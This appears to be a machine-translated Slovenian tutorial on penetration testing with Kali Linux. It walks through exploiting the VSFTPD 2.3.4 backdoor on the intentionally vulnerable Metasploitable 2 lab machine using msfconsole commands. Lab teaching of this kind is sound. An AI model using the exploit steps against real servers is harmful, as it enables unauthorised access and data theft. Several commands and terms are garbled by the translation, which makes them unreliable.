metasploit

Metasploit v Kali Linux 2020

Metasploit v Kali Linux 2020

Testiranje penetracije s sistemom Kali Linux


Internet je poln skrivalcev z zlonamernimi namerami, ki želijo dostopati do omrežij in izkoriščati svoje podatke, medtem ko se izogibajo zaznavanju. Varnost omrežja je smiselno zagotoviti le z merjenjem njihovih ranljivosti. Testiranje penetracije ali etično vdiranje je način, kako testiramo omrežja ali strežnike na nevarne cilje, tako da določimo vse možne kršitve, ki bi jih heker lahko uporabil za dostop, s čimer zmanjšamo varnostne kompromise. Testiranje penetracije se pogosto izvaja prek programskih aplikacij, med katerimi je najbolj priljubljena Kali Linux, po možnosti z ogrodjem Metasploit. Ostanite do konca, da se naučite preizkusiti sistem z izvajanjem napada s sistemom Kali Linux.

Uvod v Kali Linux in ogrodje Metasploit

Kali Linux je eno izmed mnogih naprednih orodij za varnost sistema, ki jih je razvilo (in redno posodabljalo) Offensive Security. Gre za operacijski sistem, ki temelji na Linuxu in ima nabor orodij, zasnovanih predvsem za testiranje penetracije. Je dokaj enostaven za uporabo (vsaj v primerjavi z drugimi programi za testiranje peresnikov) in dovolj zapleten, da predstavi ustrezne rezultate.

The Metasploit Framework je odprtokodna modularna platforma za testiranje penetracije, ki se uporablja za napade na sisteme za preizkušanje varnostnih podvigov. Je eno najpogosteje uporabljenih orodij za testiranje penetracije in je vgrajeno v Kali Linux.

Metasploit je sestavljen iz shrambe podatkov in modulov. Datastore omogoča uporabniku, da konfigurira vidike znotraj okvira, medtem ko so moduli samostojni delčki kod, iz katerih Metasploit izhaja iz svojih funkcij. Ker se osredotočamo na izvajanje napada za testiranje peresa, bomo razpravo nadaljevali po modulih.

Skupno obstaja pet modulov:

Izkoriščajte - izogne ​​se zaznavanju, vdre v sistem in naloži modul koristnega tovora
Nosilnost - Uporabniku omogoča dostop do sistema
Pomožni -podpira kršitve z izvajanjem nalog, ki niso povezane z izkoriščanjem
Objavi-Izkoriščanje - omogoča nadaljnji dostop do že ogroženega sistema
NOP generator - se uporablja za izogibanje varnostnim IP-jem

Za naše namene bomo za dostop do ciljnega sistema uporabili module Exploit in payload.

Nastavitev laboratorija za testiranje pisala

Potrebovali bomo naslednjo programsko opremo:

Kali Linux:

Kali Linux bo deloval iz naše lokalne strojne opreme. Za lociranje podvigov bomo uporabili njegov okvir Metasploit.

Hipervizor:

Potrebovali bomo hipervizor, saj nam omogoča ustvarjanje navidezni stroj, kar nam omogoča delo na več operacijskih sistemih hkrati. To je bistveni predpogoj za testiranje penetracije. Za gladko plovbo in boljše rezultate priporočamo uporabo obeh Virtualbox ali Microsoft Hyper-V ustvariti navidezni stroj na.

Metasploitable 2

Ne gre zamenjati z Metasploitom, ki je okvir v Kali Linux, metasploitable je namerno ranljiv navidezni stroj, programiran za usposabljanje strokovnjakov na področju kibernetske varnosti. Metasploitable 2 ima na tone znane preizkusljive ranljivosti, ki jih lahko izkoristimo, v spletu pa je na voljo dovolj informacij, ki nam pomagajo začeti.

Čeprav je napad na navidezni sistem v Metasploitable 2 enostaven, ker so njegove ranljivosti dobro dokumentirane, boste potrebovali veliko več strokovnega znanja in potrpljenja z resničnimi stroji in omrežji, za katera boste sčasoma izvedli preizkus penetracije. Toda uporaba metasploitable 2 za testiranje peresa je odlično izhodišče za spoznavanje metode.

Za nadaljnje preskušanje peresnikov bomo uporabili metasploitable 2. Za delovanje tega navideznega računalnika ne potrebujete veliko računalniškega pomnilnika, prostor na trdem disku 10 GB in 512 MB RAM-a bi se moral dobro odrezati. Prepričajte se, da ste med namestitvijo spremenili omrežne nastavitve za Metasploitable na gostiteljski adapter. Ko je nameščen, zaženite Metasploitable in se prijavite. Zaženite Kali Linux, da bomo lahko začeli preizkušati njegovo ogrodje Metasploit.

Izkoriščanje VSFTPD v2.3.4 Izvedba ukaza v zakulisju

Ko so vse stvari na njihovem mestu, lahko končno poiščemo ranljivost, ki jo bomo izkoristili. Po spletu lahko poiščete različne ranljivosti, toda za to vadnico bomo videli, kako deluje VSFTPD v2.3.4 je mogoče izkoristiti. VSFTPD pomeni zelo varen demon FTP. To smo izbrali, ker nam omogoča popoln dostop do vmesnika Metasploitable brez dovoljenja.

Zaženite konzolo Metasploit. Pojdite v ukazni poziv v Kali Linux in vnesite naslednjo kodo:

$ sudo msfconsole

Z zdaj odprto konzolo vnesite:

$ iskanje vsftpd

To prikaže lokacijo ranljivosti, ki jo želimo izkoristiti. Če ga želite izbrati, vnesite

$ use exploit / unix / ftp / vsftpd_234_backdoor

Če želite videti, katere dodatne informacije so potrebne za zagon izkoriščanja, vnesite

$ show možnosti

Edina pomembna informacija, ki manjka, je IP, ki ga bomo posredovali.

Z vnosom poiščite naslov IP v metasploitable

$ ifconfig

V svoji ukazni lupini

IP naslov je na začetku druge vrstice, nekako tako

# Inet addr: 10.0.2.15

Vnesite ta ukaz, da usmerite Metasploit v ciljni sistem in začnite s preizkusom. Uporabljam svoj ip, vendar bo prišlo do napake, če pa uporabite drugačen IP žrtve, boste izkoristili rezultate

$ set RHOST [žrtev IP]

$ teči

Zdaj lahko s popolnim dostopom do Metasploitable krmarimo po sistemu brez kakršnih koli omejitev. Lahko prenesete kakršne koli tajne podatke ali s strežnika odstranite kar koli pomembnega. V resničnih situacijah, ko blackhat pridobi dostop do takšnega strežnika, lahko celo izklopi CPU, zaradi česar se zrušijo tudi vsi drugi z njim povezani računalniki.

Zavijanje stvari

Bolje je težave predhodno odpraviti, kot pa se nanje odzvati. Testiranje s penetracijo vam lahko prihrani veliko težav in dohitevanja, ko gre za varnost vaših sistemov, naj bo to en računalniški stroj ali celotno omrežje. Glede na to je koristno imeti osnovno znanje o testiranju s peresom. Metasploitable je odlično orodje za spoznavanje njegovih bistvenih lastnosti, saj so njegove ranljivosti dobro znane, zato je na njem veliko informacij. S programom Kali Linux smo delali samo na enem preizkusu, vendar vam toplo priporočamo, da jih poglobite.

Zaslonska sledilna ploščica in kazalec miške AppyMouse za tablične računalnike Windows
Uporabniki tabličnih računalnikov pogosto zgrešijo miškin kazalec, še posebej kadar običajno uporabljajo prenosne računalnike. Pametni telefoni in tab...
Srednji gumb miške ne deluje v sistemu Windows 10
The srednji gumb miške vam pomaga, da se pomikate po dolgih spletnih straneh in zaslonih z veliko podatkov. Če se to ustavi, boste na koncu uporabili ...
Kako spremeniti levi in ​​desni gumb miške na računalniku z operacijskim sistemom Windows 10
Povsem normalno je, da so vse naprave računalniške miške ergonomsko zasnovane za desničarje. Na voljo pa so miške, ki so posebej zasnovane za levičarj...